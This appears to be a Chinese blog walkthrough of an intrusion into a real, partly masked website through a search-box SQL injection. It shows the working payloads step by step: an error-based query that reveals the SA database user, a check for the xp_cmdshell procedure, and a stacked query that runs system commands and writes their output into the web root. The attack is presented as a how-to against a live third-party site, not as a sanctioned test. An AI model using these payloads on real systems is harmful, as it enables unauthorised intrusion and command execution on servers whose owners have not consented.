目标站点：http://www.tan***.net

该网站倒是做了防注入的，一般的页面上不存在注入点，可惜防注入还是不够严密，某个页面的一个搜索框没有检测用户提交上来的数据，直接将用户提交的数据带入到数据库中查询，导致出现了搜索型的注入漏洞。

在搜索框中输入1’，发现页面暴错：

根据暴错页面我们可以得知网站的物理路径和网站用的是MSSQL数据库，并且从url处发现搜索的关键字是以GET形式提交的。

我们知道搜索型的注入点提交的SQL语句，其原型大致为：Select  *  from  表名  where  字段  like  ‘%关键字%’，当提交的关键字为1’时，由于带入数据库查询的SQL语句后的’%没有完全闭合，所以页面当然会出错。

为了防止页面出错把我们将要提交的关键字写成这样：1%’ and 1=1 ‘%’=’

那么提交后带入数据库中查询的语句就变成了：Select * from 表名 where 字段 like ‘%1%’ and 1=1 ‘%’=’%’

或者也可以写成这样：1%’ and 1=1–

那么SQL语句就变为：Select * from 表名 where 字段 like ‘%1%’ and 1=1–%’（注释掉了后面的%’，那么这条语句也成立)

由于这两条SQL语句是真确的，所以会返回正常页面，如图：

接下来我们看看这个网站与数据库连接的用户名，提交的关键字为：1%’ and user>0–

页面暴错了，将用户名转换为整数型的值和0比较大小肯定会出错，所以就把用户名暴出来了，注意在MSSQL显错的情况下暴用户名出现了dbo并不表示用户名是dbo，而其实是SA，是SA了好啊，拥有最高权限，可以直接调用各种储存扩展来攻击。

首先想到了cmdshell，来看看它能不能用，提交语句：1%’ and 1=(select count(*) FROM master.dbo.sysobjects where xtype = ‘X’ AND name = ‘xp_cmdshell’)–

页面返回正确，表明cmdshell储存扩展可用，那么我们可以直接调用此扩展来执行系统命令了，但是提交执行语句后页面上并不会回显命令执行结果，不过没关系，前面不是已经知道网站的物理路径了吗，那么就可以将命令运行结果输入到网站根目录下的一个txt文件里，然后用浏览器访问，就可以看到执行结果了。

先查一下服务器的ip，提交语句：1%’;exec master..xp_cmdshell ‘ipconfig >f:\tzwwwroot\1.txt’–

页面返回正常，接先来访问这个1.txt文件查看命令执行结果，如图：

这服务器还不是外网ip，如果想用远程桌面连接上去的话还要做端口映射，很麻烦，这里就不再演示了。

打赏

微信扫一扫，打赏作者吧～